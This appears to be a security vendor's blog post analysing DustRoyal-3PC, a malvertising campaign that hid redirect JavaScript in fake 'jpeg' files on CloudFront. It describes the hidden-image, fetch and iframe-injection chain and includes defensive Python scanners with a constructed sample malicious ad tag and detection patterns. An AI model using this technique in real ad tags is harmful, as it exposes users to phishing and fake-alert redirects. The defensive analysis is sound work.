Redirect Rampage Released Via Cloud Storage


DustRoyal-3PC redirect influx hides behind CDNs

The use of hacked brand websites and landing pages as malware delivery vectors continues to grow, but that doesn’t mean redirects via ad tags are stagnating. Indeed, they appear to be evolving to better evade detection and creative-blocking technology.

Rather than cycling through domains, threat actors are using creative image files in cloud storage to evade detection and bypass domain-oriented blocking tools. (Who’s going to block a CDN/content distribution network? No one.) Extensive investigation is required to identify rogue CDN-hosted URLs and shut down attacks.

That’s just what happened in early 2023 when The Media Trust Digital Security and Operations (DSO) team identified and terminated a widespread malicious ad campaign that used CDNs as a payload delivery path. The campaign generated dozens of incidents affecting consumers around the world—particularly in Canada, Germany, Japan and the US. Its ad tag call chain included both a normal “jpg” and a malicious “jpeg” URL; under the right conditions, the malicious URL redirects to fake virus alerts, phishing scams, and other malicious landing pages, harming the digital experience for thousands of consumers.

Uncovering the DustRoyal threat

The phishing-oriented attack, dubbed DustRoyal-3PC (DustRoyal), is the latest evolution in malvertising using cloud-hosted creative files. Two key attributes led to the detection of the malvertising campaign: inconsistent file sizes and JavaScript masquerading as image files.

In January, DSO detected several CDN-hosted URLs (most associated with CloudFront, a widely-used CDN) delivering suspiciously large image files relative to what is typically found in ad delivery. The reported length and the actual size of the files also did not match, a strange inconsistency given that they were delivered by the same URL in the same scan. [Figure 1]


Figure 1: Note the differences in the size of the data delivered despite the identical URL structure

These “jpeg” files did not render when the URL was manually loaded into a browser, as a standard .jpg image would. Upon further investigation, the content delivered by these “jpegs” was not an image at all. Instead, each response carried a large JavaScript file wrapped in HTML script tags—including CSS attributes, most likely to help disguise the nature of the underlying code being delivered.

Makings of a Redirect Attack

The threat actors use an ad tag containing an image plus JavaScript code that has no role in rendering the creative and instead performs additional actions. The source URLs used by the malicious script appear innocuous. [Figure 2]


Figure 2: The ad tag code utilizing the malicious cloudfront hosts

First, DustRoyal creates a link that points to a legitimate advertiser (https://www.ontheplussude[.]com) and includes a query string parameter “gclid” which is used to track the source of the traffic. The “target” attribute specifies that the link should open in a new browser tab or window when clicked.

Next, the ad’s image element points to a source URL (jpg) and, via its “data-src” attribute, to the decoy creative (jpeg). This decoy image is never shown on the page because the element carries a “display:none” style attribute.

Finally, DustRoyal contains JavaScript code to fetch the “data-src” image URL and append a new HTML iframe element to the page. The iframe displays content from the fetch call’s response and it also includes a “data-znn” attribute (14814_ssssssssss99d1fe). [Figure 3]


Figure 3: The underlying redirection mechanism with iframe creation and content injection

In addition to creating a new iframe that loads content from the fetch call response, this JavaScript also removes the original link element from the page and initiates the redirect of unsuspecting users to fake virus alerts, phishing scams, and other malicious landing pages.
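The three traits described above (a hidden image carrying a “data-src” URL, a “jpeg” data-src beside a “jpg” src, and an inline script that fetches the data-src and injects an iframe) can be checked statically before an ad tag is served. The following scanner is an added example, not The Media Trust’s detection code; the CloudFront hostnames, the gclid value and the sample tags are constructed placeholders, not indicators from the campaign.

```python
# Added example (not The Media Trust's code): static scan of an ad tag for the
# DustRoyal-3PC markup pattern. All hosts and values below are placeholders.
import re
from html.parser import HTMLParser


class AdTagScanner(HTMLParser):
    """Records hidden <img data-src> elements and inline script text."""

    def __init__(self):
        super().__init__()
        self.findings, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "img" and a.get("data-src"):
            style = (a.get("style") or "").replace(" ", "").lower()
            if "display:none" in style:
                self.findings.append("hidden <img> carries a data-src URL")
            # A 'jpeg' data-src next to a different 'jpg' src is the call chain of Figure 2.
            if re.search(r"\.jpe?g(\?|$)", a["data-src"], re.I) and a["data-src"] != a.get("src"):
                self.findings.append("data-src image URL differs from src")

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scan_ad_tag(markup):
    """Return the list of findings; an empty list means none of the traits was seen."""
    p = AdTagScanner()
    p.feed(markup)
    js = "\n".join(p.scripts).lower()
    # The loader fetches the data-src URL and injects the response through an iframe.
    if "fetch(" in js and ("data-src" in js or "dataset.src" in js) and "iframe" in js:
        p.findings.append("inline script fetches data-src and injects an iframe")
    return p.findings


# Constructed inputs modelled on Figures 2 and 3; not real ad tags or IOCs.
SUSPECT_TAG = """<a href="https://www.ontheplussude[.]com/?gclid=PLACEHOLDER" target="_blank">
<img src="https://d0placeholder.cloudfront.net/c.jpg" data-src="https://d1placeholder.cloudfront.net/c.jpeg" style="display: none"></a>
<script>var i=document.querySelector("img[data-src]");fetch(i.dataset.src).then(r=>r.text())
.then(function(t){var f=document.createElement("iframe");/* injected content */document.body.appendChild(f);});</script>"""
BENIGN_TAG = '<a href="https://example.com" target="_blank"><img src="https://d0placeholder.cloudfront.net/c.jpg"></a>'

if __name__ == "__main__":
    print(scan_ad_tag(SUSPECT_TAG))  # three findings
    print(scan_ad_tag(BENIGN_TAG))   # []
```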

CDNs as a Front for Malvertising

Content delivery networks are used to deliver static and dynamic web content, video streams, APIs, and other web assets to users around the world without driving latency, slowing transfer speeds, or timing out. They store copies of your content in edge locations—data centers around the world—and route content requests to the edge location nearest to the user, which helps reduce the latency and improve the overall user experience.

Unfortunately, what makes CDNs such a great tool for business owners also means they can be used effectively in the distribution of malware by hosting malicious files. Common scenarios include:

  • Ad fraud: Cloud-hosted ad URLs are used to generate fraudulent clicks or impressions, which inflate the cost of advertising campaigns or generate revenue for the malvertiser.
  • Exploit kits: Malicious ads that, when clicked, redirect to a page containing an exploit kit; i.e., tools that probe for vulnerabilities and/or install malware on consumer devices.
  • Phishing attacks: When a user clicks on a phishing ad, they may be redirected to a fake website that looks like a legitimate site (e.g., a banking site) where they are prompted to enter their login credentials.

For now, DustRoyal relies on CloudFront, a widely used and trusted CDN. However, we’re on the lookout for this activity across other CDNs due to their ubiquity in today’s digital advertising supply chain. A CDN’s ability to easily generate and quickly distribute URLs makes it attractive to cybercriminals who want to avoid detection and increase the effectiveness of their attacks.

Defending against a CDN-hosted malvertising attack

Similar to how GhostCat rapidly cycles through JavaScript hosted in cloud storage, DustRoyal cycles through CDN-hosted images. Under the right conditions, consumers are redirected to popups and fake advertising landing pages to phish for information.

While the initial campaign—affecting a handful of DSPs—was shut down within 11 days, new campaigns began emerging in late April across multiple DSPs, networks and publishers. It’s clear that the test period is over and the tactic is expanding to affect more parties. AdTech and publishers need to be aware of this evolving threat vector. An on-page/in-app blocker cannot block the whole cloud service. It requires more detective work to find the miscreant files.

Identifying the compromised/malicious CDN hosts and the code used by these malicious calls is essential for timely detection. The Media Trust specializes in detecting the patterns used by malvertisers and has developed key signatures to detect these IOCs. In addition, ensure your creative blocking tool can functionally address the attacks occurring within injected iframes.

  • Ad tags that include a “.jpeg” CloudFront URL that does not resolve to an image when visited manually
  • Multiple calls to CloudFront hosts ending in “jpg” or “jpeg”
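The two heuristics above, together with the traits that first exposed the campaign (oversized “images”, a reported length that does not match the delivered size, and script-in-HTML served from a “jpeg” URL), can be applied to each fetched creative. The check below is an added example, not The Media Trust’s signatures; the size ceiling is an assumed tuning value, the hostnames are placeholders, and the two responses are constructed to imitate a real JPEG and a masquerading one.

```python
# Added example (not The Media Trust's code): validate that a creative URL ending in
# .jpg/.jpeg really returned image bytes. Hosts, sizes and responses are placeholders.
import os
from urllib.parse import urlparse

# Leading bytes of the image formats an ad creative normally uses.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_CREATIVE_BYTES = 300_000  # assumed ceiling for a display creative; tune per inventory


def check_creative(url, headers, body):
    """Return findings for one fetched creative; an empty list means it looks like a real image."""
    findings = []
    hdr = {k.lower(): v for k, v in headers.items()}
    ext = os.path.splitext(urlparse(url).path)[1].lower()
    # 1. A 'jpeg' URL that does not start with JPEG magic is not an image.
    if ext in MAGIC and not body.startswith(MAGIC[ext]):
        findings.append(f"{ext} URL did not return {ext} image bytes")
    # 2. Script wrapped in HTML (Figure 1's masquerading payload) inside an image response.
    low = body.lower()
    if b"<script" in low or b"<html" in low:
        findings.append("response contains HTML/script markup")
    # 3. Declared length differs from what was actually delivered.
    declared = hdr.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append(f"content-length {declared} != delivered {len(body)} bytes")
    # 4. Far larger than any creative the slot should carry.
    if len(body) > MAX_CREATIVE_BYTES:
        findings.append(f"creative is {len(body)} bytes, above the expected ceiling")
    return findings


# Constructed responses: a small genuine JPEG and a 'jpeg' that is really script in HTML.
REAL_JPG_URL = "https://d0placeholder.cloudfront.net/creative.jpg"
REAL_JPG = (b"\xff\xd8\xff\xe0" + b"\x00" * 60, {"Content-Type": "image/jpeg", "Content-Length": "64"})
FAKE_JPEG_URL = "https://d1placeholder.cloudfront.net/creative.jpeg"
FAKE_JPEG_BODY = (b'<html><script style="color:#fff">/* large script body */'
                  + b"a" * 400_000 + b"</script></html>")
FAKE_JPEG = (FAKE_JPEG_BODY, {"Content-Type": "image/jpeg", "Content-Length": "12000"})

if __name__ == "__main__":
    print(check_creative(REAL_JPG_URL, REAL_JPG[1], REAL_JPG[0]))    # []
    print(check_creative(FAKE_JPEG_URL, FAKE_JPEG[1], FAKE_JPEG[0]))  # four findings
```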

IOCs (and counting)



* Naming Convention Note: Phishing attacks are represented by wind-related themes. Color represents the gravity of the threat using the ROYGBIV scale, where red signifies major and violet signifies minor impact. 3PC refers to the use of third-party code to distribute the malware; in this instance, it involves the use of CDNs to host malicious files used in the digital advertising ecosystem.